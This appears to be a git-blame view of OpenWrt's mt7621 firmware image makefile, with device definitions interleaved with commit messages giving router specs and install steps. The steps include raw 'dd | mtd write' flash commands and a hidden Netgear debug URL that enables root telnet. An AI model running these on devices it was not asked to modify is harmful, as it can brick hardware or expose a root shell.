boot system can also be implemented in OpenWrt with almost no effort. Signed-off-by: Davide Fioravanti <pantanastyle@gmail.com> Co-Developed-by: Jackson Lim <jackcolentern@gmail.com> Signed-off-by: Jackson Lim <jackcolentern@gmail.com>
2020-05-11 23:27:50 +00:00
UBINIZE_OPTS := -E 5
IMAGES := sysupgrade.bin factory.bin
IMAGE/sysupgrade.bin := sysupgrade-tar | append-metadata | check-size
IMAGE/factory.bin := append-kernel | pad-to $$$$(KERNEL_SIZE) | \
append-ubi | check-size | linksys-image type=EA7500v2
endef
TARGET_DEVICES += linksys_ea7500-v2
define Device/linksys_re6500
IMAGE_SIZE := 7872k
DEVICE_VENDOR := Linksys
DEVICE_MODEL := RE6500
DEVICE_PACKAGES := kmod-mt76x2 wpad-basic
SUPPORTED_DEVICES += re6500
ramips: add support for Xiaomi Mi Router 3 Pro Hardware: CPU: MediaTek MT7621AT (2x880MHz) RAM: 512MB DDR3 FLASH: 256MB NAND WiFi: 2.4GHz 4x4 MT7615 b/g/n (Needs driver, See Issues!) WiFI: 5GHz 4x4 MT7615 a/n/ac (Needs driver, See Issues!) USB: 1x 3.0 ETH: 1x WAN 10/100/1000 3x LAN 10/100/1000 LED: Power/Status BTN: RESET UART: 115200 8n1 Partition layout and boot: Stock Xiaomi firmware has the MTD split into (among others) - kernel0 (@0x200000) - kernel1 (@0x600000) - rootfs0 - rootfs1 - overlay (ubi) Xiaomi uboot expects to find kernels at 0x200000 & 0x600000 referred to as system 1 & system 2 respectively. a kernel is considered suitable for handing control over if its linux magic number exists & uImage CRC are correct. If either of those conditions fail, a matching sys'n'_fail flag is set in uboot env & a restart performed in the hope that the alternate kernel is okay. If neither kernel checksums ok and both are marked failed, system 2 is booted anyway. Note uboot's tftp flash install writes the transferred image to both kernel partitions. Installation: Similar to the Xiaomi MIR3G, we keep stock Xiaomi firmware in kernel0 for ease of recovery, and install OpenWRT into kernel1 and after. The installation file for OpenWRT is a *squashfs-factory.bin file that contains the kernel and a ubi partition. This is flashed as follows: nvram set flag_try_sys1_failed=1 nvram set flag_try_sys2_failed=0 nvram commit dd if=factory.bin bs=1M count=4 | mtd write - kernel1 dd if=factory.bin bs=1M skip=4 | mtd write - rootfs0 reboot Reverting to stock: The part of stock firmware we've kept in kernel0 allows us to run stock recovery, which will re-flash stock firmware from a *.bin file on a USB. For this we do the following: fw_setenv flag_try_sys1_failed 0 fw_setenv flag_try_sys2_failed 1 reboot After reboot the LED status light will blink red, at which point pressing the 'reset' button will cause stock firmware to be installed from USB. Issues: OpenWRT currently does not have support for the MT7615 wifi chips. There is ongoing work to add mt7615 support to the open source mt76 driver. Until that support is in place, there are closed-source kernel modules that can be used. See: https://forum.openwrt.org/t/support-for-xiaomi-wifi-r3p-pro/20290/170 Signed-off-by: Ozgur Can Leonard <ozgurcan@gmail.com> Signed-off-by: Christian Lamparter <chunkeey@gmail.com> [02_network remaps, Added link to notes]
2019-03-05 08:41:37 +00:00
endef
TARGET_DEVICES += linksys_re6500
ramips: add support for Xiaomi Mi Router 3 Pro Hardware: CPU: MediaTek MT7621AT (2x880MHz) RAM: 512MB DDR3 FLASH: 256MB NAND WiFi: 2.4GHz 4x4 MT7615 b/g/n (Needs driver, See Issues!) WiFI: 5GHz 4x4 MT7615 a/n/ac (Needs driver, See Issues!) USB: 1x 3.0 ETH: 1x WAN 10/100/1000 3x LAN 10/100/1000 LED: Power/Status BTN: RESET UART: 115200 8n1 Partition layout and boot: Stock Xiaomi firmware has the MTD split into (among others) - kernel0 (@0x200000) - kernel1 (@0x600000) - rootfs0 - rootfs1 - overlay (ubi) Xiaomi uboot expects to find kernels at 0x200000 & 0x600000 referred to as system 1 & system 2 respectively. a kernel is considered suitable for handing control over if its linux magic number exists & uImage CRC are correct. If either of those conditions fail, a matching sys'n'_fail flag is set in uboot env & a restart performed in the hope that the alternate kernel is okay. If neither kernel checksums ok and both are marked failed, system 2 is booted anyway. Note uboot's tftp flash install writes the transferred image to both kernel partitions. Installation: Similar to the Xiaomi MIR3G, we keep stock Xiaomi firmware in kernel0 for ease of recovery, and install OpenWRT into kernel1 and after. The installation file for OpenWRT is a *squashfs-factory.bin file that contains the kernel and a ubi partition. This is flashed as follows: nvram set flag_try_sys1_failed=1 nvram set flag_try_sys2_failed=0 nvram commit dd if=factory.bin bs=1M count=4 | mtd write - kernel1 dd if=factory.bin bs=1M skip=4 | mtd write - rootfs0 reboot Reverting to stock: The part of stock firmware we've kept in kernel0 allows us to run stock recovery, which will re-flash stock firmware from a *.bin file on a USB. For this we do the following: fw_setenv flag_try_sys1_failed 0 fw_setenv flag_try_sys2_failed 1 reboot After reboot the LED status light will blink red, at which point pressing the 'reset' button will cause stock firmware to be installed from USB. Issues: OpenWRT currently does not have support for the MT7615 wifi chips. There is ongoing work to add mt7615 support to the open source mt76 driver. Until that support is in place, there are closed-source kernel modules that can be used. See: https://forum.openwrt.org/t/support-for-xiaomi-wifi-r3p-pro/20290/170 Signed-off-by: Ozgur Can Leonard <ozgurcan@gmail.com> Signed-off-by: Christian Lamparter <chunkeey@gmail.com> [02_network remaps, Added link to notes]
2019-03-05 08:41:37 +00:00
define Device/mediatek_ap-mt7621a-v60
IMAGE_SIZE := 7872k
DEVICE_VENDOR := Mediatek
DEVICE_MODEL := AP-MT7621A-V60 EVB
DEVICE_PACKAGES := kmod-usb3 kmod-sdhci-mt7620 kmod-sound-mt7620
endef
TARGET_DEVICES += mediatek_ap-mt7621a-v60
define Device/mediatek_mt7621-eval-board
BLOCKSIZE := 64k
ramips/mt7621: fix IMAGE_SIZE for all devices This fixes IMAGE_SIZE for all devices based on the partition size given in DTS: DEVICE *.MK *.DTS VERDICT afoundry_ew1200 (16M) 0xfb0000 asiarf_ap7621-001 (16M) 0xfa0000 wrong buffalo_wsr-1166dhp (16M) 0xf90000 wrong buffalo_wsr-600dhp (16M) 0xfb0000 dlink_dir-860l-b1 (16M) 0xfb0000 d-team_newifi-d2 (32M) 0x1fb0000 d-team_pbr-m1 (16M) 0xfb0000 elecom_wrc-1167ghbk2-s 15488k 0xf20000 elecom_wrc-1900gst 11264k 0xb00000 elecom_wrc-2533gst 11264k 0xb00000 firefly_firewrt (16M) 0xfb0000 gehua_ghl-r-001 (32M) 0x1fb0000 gnubee_gb-pc1 (32M) 0x1fb0000 gnubee_gb-pc2 (32M) 0x1fb0000 hiwifi_hc5962 (32M) 0x2000000 wrong (kernel + ubi) iodata_wn-ax1167gr 15552k 0xf30000 iodata_wn-gx300gr 7798784 0x770000 lenovo_newifi-d1 (32M) 0x1fb0000 linksys_re6500 - 0x7b0000 default mediatek_ap-mt7621a-v60 (8M) 0x7b0000 mediatek_mt7621-eval-board (4M) 0xec0000 wrong (rootfs) mikrotik_rb750gr3 [16128k] 0xfc0000 mikrotik_rbm11g [16128k] 0xFC0000 mikrotik_rbm33g [16128k] 0xFC0000 mqmaker_witi-256m (16M) 0xfb0000 mqmaker_witi-512m (16M) 0xfb0000 mtc_wr1201 16000k 0xfa0000 netgear_ex6150 14848k 0xe80000 netgear_r6220 28672k 0x1c00000 netgear_r6350 40960k 0x2800000 netgear_wndr3700-v5 15232k 0xee0000 netis_wf-2881 129280k 0x7E40000 phicomm_k2p 15744k 0xf60000 planex_vr500 66453504 0x3fb0000 wrong samknows_whitebox-v8 (16M) 0xfb0000 storylink_sap-g3200u3 - 0x7b0000 default telco-electronics_x1 16064k 0xfb0000 thunder_timecloud - 0xfb0000 wrong totolink_a7000r 16064k 0xfb0000 tplink_re350-v1 6016k 0x5e0000 ubiquiti_edgerouterx - 0xfa00000 wrong (kernel1 + ubi) ubiquiti_edgerouterx-sfp - 0xfa00000 wrong (kernel1 + ubi) unielec_u7621-06-256m-16m 16064k 0xfb0000 unielec_u7621-06-512m-64m 65216k 0x3fb0000 wevo_11acnas (16M) 0xfb0000 wevo_w2914ns-v2 (16M) 0xfb0000 xiaomi_mir3g 32768k 0x7980000 wrong (kernel + ubi) xiaomi_mir3p (32M) 0xf980000 wrong (kernel + ubi) xzwifi_creativebox-v1 (32M) 0x1fb0000 youhua_wr1200js 16064k 0xfb0000 youku_yk-l2 (16M) 0xfb0000 zbtlink_zbt-we1326 (16M) 0xfb0000 zbtlink_zbt-we3526 (16M) 0xfb0000 zbtlink_zbt-wg2626 (16M) 0xfb0000 zbtlink_zbt-wg3526-16m (16M) 0xfb0000 zbtlink_zbt-wg3526-32m (32M) 0x1fb0000 No verdict means that the device is correctly set. Legend: ( ): Value is set via ralink_default_fw_size_xxM [ ]: Value is derived from parent definition - : Value is not set and derived from default definition Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
2019-07-15 12:55:24 +00:00
IMAGE_SIZE := 15104k
DEVICE_VENDOR := MediaTek
DEVICE_MODEL := MT7621 EVB
SUPPORTED_DEVICES += mt7621
endef
TARGET_DEVICES += mediatek_mt7621-eval-board
define Device/MikroTik
DEVICE_VENDOR := MikroTik
BLOCKSIZE := 64k
IMAGE_SIZE := 16128k
DEVICE_PACKAGES := kmod-usb3
LOADER_TYPE := elf
KERNEL := $(KERNEL_DTB) | loader-kernel
IMAGE/sysupgrade.bin := append-kernel | kernel2minor -s 1024 | \
pad-to $$$$(BLOCKSIZE) | append-rootfs | pad-rootfs | append-metadata | \
check-size
endef
define Device/mikrotik_routerboard-750gr3
$(Device/MikroTik)
DEVICE_MODEL := RouterBOARD 750Gr3
DEVICE_PACKAGES += kmod-gpio-beeper
SUPPORTED_DEVICES += mikrotik,rb750gr3
endef
TARGET_DEVICES += mikrotik_routerboard-750gr3
define Device/mikrotik_routerboard-m11g
$(Device/MikroTik)
DEVICE_MODEL := RouterBOARD M11G
SUPPORTED_DEVICES += mikrotik,rbm11g
endef
TARGET_DEVICES += mikrotik_routerboard-m11g
define Device/mikrotik_routerboard-m33g
$(Device/MikroTik)
DEVICE_MODEL := RouterBOARD M33G
SUPPORTED_DEVICES += mikrotik,rbm33g
endef
TARGET_DEVICES += mikrotik_routerboard-m33g
define Device/mqmaker_witi
IMAGE_SIZE := 16064k
DEVICE_VENDOR := MQmaker
DEVICE_MODEL := WiTi
DEVICE_PACKAGES := kmod-ata-ahci kmod-mt76x2 kmod-sdhci-mt7620 kmod-usb3 \
kmod-usb-ledtrig-usbport wpad-basic
SUPPORTED_DEVICES += witi mqmaker,witi-256m mqmaker,witi-512m
endef
TARGET_DEVICES += mqmaker_witi
define Device/mtc_wr1201
IMAGE_SIZE := 16000k
DEVICE_VENDOR := MTC
DEVICE_MODEL := Wireless Router WR1201
KERNEL_INITRAMFS := $(KERNEL_DTB) | custom-initramfs-uimage WR1201_8_128
DEVICE_PACKAGES := kmod-sdhci-mt7620 kmod-mt76x2 kmod-usb3 \
kmod-usb-ledtrig-usbport wpad-basic
endef
TARGET_DEVICES += mtc_wr1201
define Device/netgear_ex6150
DEVICE_VENDOR := NETGEAR
DEVICE_MODEL := EX6150
DEVICE_PACKAGES := kmod-mt76x2 wpad-basic
NETGEAR_BOARD_ID := U12H318T00_NETGEAR
IMAGE_SIZE := 14848k
IMAGES += factory.chk
IMAGE/factory.chk := $$(sysupgrade_bin) | check-size | netgear-chk
endef
TARGET_DEVICES += netgear_ex6150
define Device/netgear_sercomm_nand
$(Device/uimage-lzma-loader)
ramips: add support for Netgear R6350 Netgear R6350 is a wireless router, aka Netgear AC1750. Specification: - SoC: Mediatek MT7621AT (2 CPU cores, 4 threads) - RAM: 128MiB (Nanya NT5CC64M16GP-DI) - ROM: 128MiB NAND Flash (Macronix MX30LF1G18AC-TI) - Wireless: for 11b/g/n (upto 300Mbps): MT7603 for 11a/ac (upto 1450Mbps) : MT7615, is not avaliable now - Ethernet LAN speed: up to 1000Mbps - Ethernet LAN ports: 4 - Ethernet WAN speed: up to 1000Mbps - Ethernet WAN ports: 1 - USB ports: 1 (USB 2.0) - LEDs: 4 (all can be controlled by SoC's GPIO) - buttons: 2 - serial ports: unknown Installation through telnet: - Copy kernel.bin and rootfs.bin to a USB flash disk, plug to usb port on the router. - Enable telnet with link: http://192.168.1.1/setup.cgi?todo=debug (login if required, default: admin password) - You will see "Debug Enabled!" - Telnet 192.168.1.1 and login with "root" - ls /mnt/shares/ to find out path of your USB disk. 'myUdisk' for example. - cd /mnt/shares/myUdisk - mtd_write write rootfs.bin Rootfs - mtd_write write kernel.bin Kernel - reboot recovery when bricked: nmrpflash can be used to recover to the netgear firmware if a broken image was flashed. The SC_PART_MAP partition suggests that an on flash partition table exists. After implementing a partition parser/builder for the sercom partition format, the definitions don't match the flash layout used by the stock firmware. It either means the partition format has not yet been completely understood or it isn't used by the stock firmware. For now, use fixed partitions instead. Signed-off-by: NOGUCHI Hiroshi <drvlabo@gmail.com> [apply latest ramips changes and document the on flash partition map issues] Signed-off-by: Mathias Kresin <dev@kresin.me>
2018-08-24 01:36:13 +00:00
BLOCKSIZE := 128k
PAGESIZE := 2048
KERNEL_SIZE := 4096k
UBINIZE_OPTS := -E 5
IMAGES += factory.img kernel.bin rootfs.bin
IMAGE/factory.img := pad-extra 2048k | append-kernel | pad-to 6144k | \
append-ubi | pad-to $$$$(BLOCKSIZE) | sercom-footer | pad-to 128 | \
zip $$$$(SERCOMM_HWNAME).bin | sercom-seal
ramips: add support for Netgear R6350 Netgear R6350 is a wireless router, aka Netgear AC1750. Specification: - SoC: Mediatek MT7621AT (2 CPU cores, 4 threads) - RAM: 128MiB (Nanya NT5CC64M16GP-DI) - ROM: 128MiB NAND Flash (Macronix MX30LF1G18AC-TI) - Wireless: for 11b/g/n (upto 300Mbps): MT7603 for 11a/ac (upto 1450Mbps) : MT7615, is not avaliable now - Ethernet LAN speed: up to 1000Mbps - Ethernet LAN ports: 4 - Ethernet WAN speed: up to 1000Mbps - Ethernet WAN ports: 1 - USB ports: 1 (USB 2.0) - LEDs: 4 (all can be controlled by SoC's GPIO) - buttons: 2 - serial ports: unknown Installation through telnet: - Copy kernel.bin and rootfs.bin to a USB flash disk, plug to usb port on the router. - Enable telnet with link: http://192.168.1.1/setup.cgi?todo=debug (login if required, default: admin password) - You will see "Debug Enabled!" - Telnet 192.168.1.1 and login with "root" - ls /mnt/shares/ to find out path of your USB disk. 'myUdisk' for example. - cd /mnt/shares/myUdisk - mtd_write write rootfs.bin Rootfs - mtd_write write kernel.bin Kernel - reboot recovery when bricked: nmrpflash can be used to recover to the netgear firmware if a broken image was flashed. The SC_PART_MAP partition suggests that an on flash partition table exists. After implementing a partition parser/builder for the sercom partition format, the definitions don't match the flash layout used by the stock firmware. It either means the partition format has not yet been completely understood or it isn't used by the stock firmware. For now, use fixed partitions instead. Signed-off-by: NOGUCHI Hiroshi <drvlabo@gmail.com> [apply latest ramips changes and document the on flash partition map issues] Signed-off-by: Mathias Kresin <dev@kresin.me>
2018-08-24 01:36:13 +00:00
IMAGE/sysupgrade.bin := sysupgrade-tar | append-metadata
IMAGE/kernel.bin := append-kernel
IMAGE/rootfs.bin := append-ubi | check-size
DEVICE_VENDOR := NETGEAR
DEVICE_PACKAGES := kmod-mt7603 kmod-usb3 kmod-usb-ledtrig-usbport wpad-basic
endef
define Device/netgear_r6220
$(Device/netgear_sercomm_nand)
DEVICE_MODEL := R6220
SERCOMM_HWNAME := R6220
SERCOMM_HWID := AYA
SERCOMM_HWVER := A001
SERCOMM_SWVER := 0x0086
IMAGE_SIZE := 28672k
DEVICE_PACKAGES += kmod-mt76x2
SUPPORTED_DEVICES += r6220
ramips: add support for Netgear R6350 Netgear R6350 is a wireless router, aka Netgear AC1750. Specification: - SoC: Mediatek MT7621AT (2 CPU cores, 4 threads) - RAM: 128MiB (Nanya NT5CC64M16GP-DI) - ROM: 128MiB NAND Flash (Macronix MX30LF1G18AC-TI) - Wireless: for 11b/g/n (upto 300Mbps): MT7603 for 11a/ac (upto 1450Mbps) : MT7615, is not avaliable now - Ethernet LAN speed: up to 1000Mbps - Ethernet LAN ports: 4 - Ethernet WAN speed: up to 1000Mbps - Ethernet WAN ports: 1 - USB ports: 1 (USB 2.0) - LEDs: 4 (all can be controlled by SoC's GPIO) - buttons: 2 - serial ports: unknown Installation through telnet: - Copy kernel.bin and rootfs.bin to a USB flash disk, plug to usb port on the router. - Enable telnet with link: http://192.168.1.1/setup.cgi?todo=debug (login if required, default: admin password) - You will see "Debug Enabled!" - Telnet 192.168.1.1 and login with "root" - ls /mnt/shares/ to find out path of your USB disk. 'myUdisk' for example. - cd /mnt/shares/myUdisk - mtd_write write rootfs.bin Rootfs - mtd_write write kernel.bin Kernel - reboot recovery when bricked: nmrpflash can be used to recover to the netgear firmware if a broken image was flashed. The SC_PART_MAP partition suggests that an on flash partition table exists. After implementing a partition parser/builder for the sercom partition format, the definitions don't match the flash layout used by the stock firmware. It either means the partition format has not yet been completely understood or it isn't used by the stock firmware. For now, use fixed partitions instead. Signed-off-by: NOGUCHI Hiroshi <drvlabo@gmail.com> [apply latest ramips changes and document the on flash partition map issues] Signed-off-by: Mathias Kresin <dev@kresin.me>
2018-08-24 01:36:13 +00:00
endef
TARGET_DEVICES += netgear_r6220
ramips: add support for Netgear R6350 Netgear R6350 is a wireless router, aka Netgear AC1750. Specification: - SoC: Mediatek MT7621AT (2 CPU cores, 4 threads) - RAM: 128MiB (Nanya NT5CC64M16GP-DI) - ROM: 128MiB NAND Flash (Macronix MX30LF1G18AC-TI) - Wireless: for 11b/g/n (upto 300Mbps): MT7603 for 11a/ac (upto 1450Mbps) : MT7615, is not avaliable now - Ethernet LAN speed: up to 1000Mbps - Ethernet LAN ports: 4 - Ethernet WAN speed: up to 1000Mbps - Ethernet WAN ports: 1 - USB ports: 1 (USB 2.0) - LEDs: 4 (all can be controlled by SoC's GPIO) - buttons: 2 - serial ports: unknown Installation through telnet: - Copy kernel.bin and rootfs.bin to a USB flash disk, plug to usb port on the router. - Enable telnet with link: http://192.168.1.1/setup.cgi?todo=debug (login if required, default: admin password) - You will see "Debug Enabled!" - Telnet 192.168.1.1 and login with "root" - ls /mnt/shares/ to find out path of your USB disk. 'myUdisk' for example. - cd /mnt/shares/myUdisk - mtd_write write rootfs.bin Rootfs - mtd_write write kernel.bin Kernel - reboot recovery when bricked: nmrpflash can be used to recover to the netgear firmware if a broken image was flashed. The SC_PART_MAP partition suggests that an on flash partition table exists. After implementing a partition parser/builder for the sercom partition format, the definitions don't match the flash layout used by the stock firmware. It either means the partition format has not yet been completely understood or it isn't used by the stock firmware. For now, use fixed partitions instead. Signed-off-by: NOGUCHI Hiroshi <drvlabo@gmail.com> [apply latest ramips changes and document the on flash partition map issues] Signed-off-by: Mathias Kresin <dev@kresin.me>
2018-08-24 01:36:13 +00:00
define Device/netgear_r6260
$(Device/netgear_sercomm_nand)
DEVICE_MODEL := R6260
SERCOMM_HWNAME := R6260
SERCOMM_HWID := CHJ
SERCOMM_HWVER := A001
SERCOMM_SWVER := 0x0052
IMAGE_SIZE := 40960k
DEVICE_PACKAGES += kmod-mt7615e kmod-mt7615-firmware
endef
TARGET_DEVICES += netgear_r6260
define Device/netgear_r6350
$(Device/netgear_sercomm_nand)
DEVICE_MODEL := R6350
SERCOMM_HWNAME := R6350
SERCOMM_HWID := CHJ
SERCOMM_HWVER := A001
SERCOMM_SWVER := 0x0052
IMAGE_SIZE := 40960k
DEVICE_PACKAGES += kmod-mt7615e kmod-mt7615-firmware
endef
TARGET_DEVICES += netgear_r6350
ramips: add support for MikroTik RouterBOARD RBM11g This commit adds support for the MikroTik RouterBOARD RBM11g. =Hardware= The RBM11g is a mt7621 based device featuring one GbE port and one miniPCIe slot with a sim card socket and USB 2.0. ==Switch== The single onboard Ethernet port is connected the CPU directly. The internal switch of the mt7621 SoC is disabled. ==Flash== The device has one spi nor flash chip. It is a 128 Mbit winbond 25Q128FVS connected to CS0. ==PCIe== The board features a single miniPCIe slot. It has a dedicated mini SIM socket and a USB 2.0 port. Power to the miniPCIe slot is controlled via GPIO9. ==USB== There are no external USB ports. ==Power== The board can accept both, passive PoE and external power via a 2.1 mm barrel jack (center-positive). The input voltage range is 11-32 V. ==Serial port== The device does have an onboard UART on an unpopulated header next to the flash chip: GND: pin 2 TX: pin 7 RX: pin 6 Settings: 115200, 8N1 See below illustration for positioning of the header. 0 = screw hole * = some pin T = TX pin R = RX pin G = GND pin Pinout: +--------------- |O | __ | / \ | \__/ | | | | +---+ | |RAM| | +--+ | | | |**| <- unpopulated header with UART | |*T| +---+ | |R*| +--------+ | |**| | | | |G*| | CPU | | +--+ | | | +--+ | | | | | +--------+ | +--+ <- flash chip |O | +-----+ | | | |+--+ | | || | | | +--------------------- =Installation= To install an OpenWRT image to the device two components must be built: 1. A openwrt initramfs image 2. A openwrt sysupgrade image ===initramfs & sysupgrade image=== Select target devices "Mikrotik RBM11G" in openwrt menuconfig and build the images. This will create the images "openwrt-ramips-mt7621-mikrotik_rbm11g-initramfs-kernel.bin" and "openwrt-ramips-mt7621-mikrotik_rbm11g-squashfs-sysupgrade.bin" in the output directory. ==Installing== **Make sure to back up your RouterOS license in case you do ever want to go back to RouterOS using "/system license output" and back up the created license file.** When rebooted the board will try booting via ethernet first. If your board does not boot via ethernet automatically you will have to attach to the serial port and set ethernet as boot device within RouterBOOT. 1. Set up a dhcp server that points the bootfile to tftp server serving the "openwrt-ramips-mt7621-mikrotik_rbm11g-initramfs-kernel.bin" initramfs image 2. Connect to ethernet port on board 3. Power on the board 4. Wait for OpenWrt to boot Right now OpenWrt will be running with a SSH server listening. Now OpenWrt must be flashed to the devices flash: 1. Copy "openwrt-ramips-mt7621-mikrotik_rbm11g-squashfs-sysupgrade.bin" to the device using scp. 2. Write openwrt to flash using "sysupgrade openwrt-ramips-mt7621-mikrotik_rbm11g-squashfs-sysupgrade.bin" Once the flashing completes the board will reboot. Disconnect from the devices ethernet port or stop the DHCP/TFTP server to prevent the device from booting via ethernet again. The device should now boot straight to OpenWrt. Signed-off-by: Tobias Schramm <tobleminer@gmail.com>
2018-06-25 20:51:43 +00:00
define Device/netgear_r6700-v2
$(Device/netgear_sercomm_nand)
DEVICE_MODEL := R6700
DEVICE_VARIANT := v2
DEVICE_ALT0_VENDOR := NETGEAR
DEVICE_ALT0_MODEL := Nighthawk AC2400
DEVICE_ALT0_VARIANT := v1
DEVICE_ALT1_VENDOR := NETGEAR
DEVICE_ALT1_MODEL := R7200
DEVICE_ALT1_VARIANT := v1
SERCOMM_HWNAME := R6950
SERCOMM_HWID := BZV
SERCOMM_HWVER := A001
SERCOMM_SWVER := 0x1032
IMAGE_SIZE := 40960k
DEVICE_PACKAGES += kmod-mt7615e kmod-mt7615-firmware
endef
TARGET_DEVICES += netgear_r6700-v2
define Device/netgear_r6800
$(Device/netgear_sercomm_nand)
DEVICE_MODEL := R6800
SERCOMM_HWNAME := R6950
SERCOMM_HWID := BZV
SERCOMM_HWVER := A001
SERCOMM_SWVER := 0x0062
IMAGE_SIZE := 40960k
DEVICE_PACKAGES += kmod-mt7615e kmod-mt7615-firmware
endef
TARGET_DEVICES += netgear_r6800
define Device/netgear_r6850
$(Device/netgear_sercomm_nand)
DEVICE_MODEL := R6850
SERCOMM_HWNAME := R6850
SERCOMM_HWID := CHJ
SERCOMM_HWVER := A001
SERCOMM_SWVER := 0x0052
IMAGE_SIZE := 40960k
DEVICE_PACKAGES += kmod-mt7615e kmod-mt7615-firmware
endef
TARGET_DEVICES += netgear_r6850
define Device/netgear_wac104
$(Device/netgear_sercomm_nand)
DEVICE_MODEL := WAC104
SERCOMM_HWNAME := WAC104
SERCOMM_HWID := CAY
SERCOMM_HWVER := A001
SERCOMM_SWVER := 0x0006
IMAGE_SIZE := 28672k
DEVICE_PACKAGES += kmod-mt76x2
endef
TARGET_DEVICES += netgear_wac104
define Device/netgear_wac124
$(Device/netgear_sercomm_nand)
DEVICE_MODEL := WAC124
SERCOMM_HWNAME := WAC124
SERCOMM_HWID := CTL
SERCOMM_HWVER := A003
SERCOMM_SWVER := 0x0402
IMAGE_SIZE := 40960k
DEVICE_PACKAGES += kmod-mt7615e kmod-mt7615-firmware
endef
TARGET_DEVICES += netgear_wac124
define Device/netgear_wndr3700-v5
$(Device/uimage-lzma-loader)
BLOCKSIZE := 64k
IMAGE_SIZE := 15232k
SERCOMM_HWID := AYB
SERCOMM_HWVER := A001
SERCOMM_SWVER := 0x1054
IMAGES += factory.img
IMAGE/default := append-kernel | pad-to $$$$(BLOCKSIZE) | append-rootfs | \
pad-rootfs
IMAGE/sysupgrade.bin := $$(IMAGE/default) | append-metadata | check-size
IMAGE/factory.img := pad-extra 320k | $$(IMAGE/default) | \
pad-to $$$$(BLOCKSIZE) | sercom-footer | pad-to 128 | zip WNDR3700v5.bin | \
sercom-seal
DEVICE_VENDOR := NETGEAR
DEVICE_MODEL := WNDR3700
DEVICE_VARIANT := v5
DEVICE_PACKAGES := kmod-mt7603 kmod-mt76x2 kmod-usb3 \
kmod-usb-ledtrig-usbport wpad-basic
SUPPORTED_DEVICES += wndr3700v5
ramips: add support for MTC Wireless Router WR1201 MTC Wireless Router WR1201 is the OEM name of the board. It is also sold rebranded as STRONG Dual Band Gigabit Router 1200. Specification: - SoC: MediaTek MT7621A (880 MHz) - Flash: 16 MiB - RAM: 128 MiB - Wireless: 2.4Ghz(MT7602EN) and 5Ghz (MT7612EN) - Ethernet speed: 10/100/1000 - Ethernet ports: 4+1 - 1x USB 3.0 - 1x microSD reader - Serial baud rate of Bootloader and factory firmware: 57600 The OEM webinterface writes only as much bytes as listed in the uImage header field to the flash. Also, the OEM webinterface evaluates the name field of uImage header before flashing (the string "WR1201_8_128") To flash via webinterface, is mandatory to use first initramfs.bin and after (from the OpenWrt) the sysupgrade.bin Some notes: - Some microSD will not work: mtk-sd 1e130000.sdhci: no support for card's volts mmc0: error -22 whilst initialising SDIO card mtk-sd 1e130000.sdhci: no support for card's volts mmc0: error -22 whilst initialising MMC card mtk-sd 1e130000.sdhci: no support for card's volts mmc0: error -22 whilst initialising SDIO card mtk-sd 1e130000.sdhci: card claims to support voltages below defined range mtk-sd 1e130000.sdhci: no support for card's volts mmc0: error -22 whilst initialising MMC card mtk-sd 1e130000.sdhci: no support for card's volts mmc0: error -22 whilst initialising SDIO card mtk-sd 1e130000.sdhci: no support for card's volts mmc0: error -22 whilst initialising MMC card Signed-off-by: Valentín Kivachuk <vk18496@gmail.com>
2018-11-29 23:13:53 +00:00
endef
TARGET_DEVICES += netgear_wndr3700-v5
ramips: add support for MTC Wireless Router WR1201 MTC Wireless Router WR1201 is the OEM name of the board. It is also sold rebranded as STRONG Dual Band Gigabit Router 1200. Specification: - SoC: MediaTek MT7621A (880 MHz) - Flash: 16 MiB - RAM: 128 MiB - Wireless: 2.4Ghz(MT7602EN) and 5Ghz (MT7612EN) - Ethernet speed: 10/100/1000 - Ethernet ports: 4+1 - 1x USB 3.0 - 1x microSD reader - Serial baud rate of Bootloader and factory firmware: 57600 The OEM webinterface writes only as much bytes as listed in the uImage header field to the flash. Also, the OEM webinterface evaluates the name field of uImage header before flashing (the string "WR1201_8_128") To flash via webinterface, is mandatory to use first initramfs.bin and after (from the OpenWrt) the sysupgrade.bin Some notes: - Some microSD will not work: mtk-sd 1e130000.sdhci: no support for card's volts mmc0: error -22 whilst initialising SDIO card mtk-sd 1e130000.sdhci: no support for card's volts mmc0: error -22 whilst initialising MMC card mtk-sd 1e130000.sdhci: no support for card's volts mmc0: error -22 whilst initialising SDIO card mtk-sd 1e130000.sdhci: card claims to support voltages below defined range mtk-sd 1e130000.sdhci: no support for card's volts mmc0: error -22 whilst initialising MMC card mtk-sd 1e130000.sdhci: no support for card's volts mmc0: error -22 whilst initialising SDIO card mtk-sd 1e130000.sdhci: no support for card's volts mmc0: error -22 whilst initialising MMC card Signed-off-by: Valentín Kivachuk <vk18496@gmail.com>
2018-11-29 23:13:53 +00:00
define Device/netis_wf2881
BLOCKSIZE := 128k
PAGESIZE := 2048
FILESYSTEMS := squashfs
KERNEL_SIZE := 4096k
IMAGE_SIZE := 129280k
UBINIZE_OPTS := -E 5
UIMAGE_NAME := WF2881_0.0.00
KERNEL_INITRAMFS := $(KERNEL_DTB) | netis-tail WF2881 | uImage lzma
IMAGES += factory.bin
IMAGE/sysupgrade.bin := sysupgrade-tar | append-metadata
IMAGE/factory.bin := append-kernel | pad-to $$$$(KERNEL_SIZE) | append-ubi | \
check-size
DEVICE_VENDOR := NETIS
DEVICE_MODEL := WF2881
DEVICE_PACKAGES := kmod-mt76x2 kmod-usb3 kmod-usb-ledtrig-usbport wpad-basic
endef
TARGET_DEVICES += netis_wf2881
define Device/phicomm_k2p
IMAGE_SIZE := 15744k
DEVICE_VENDOR := Phicomm
DEVICE_MODEL := K2P
DEVICE_ALT0_VENDOR := Phicomm
DEVICE_ALT0_MODEL := KE 2P
SUPPORTED_DEVICES += k2p
DEVICE_PACKAGES := kmod-mt7615e kmod-mt7615-firmware wpad-basic
endef
TARGET_DEVICES += phicomm_k2p
define Device/planex_vr500
$(Device/uimage-lzma-loader)
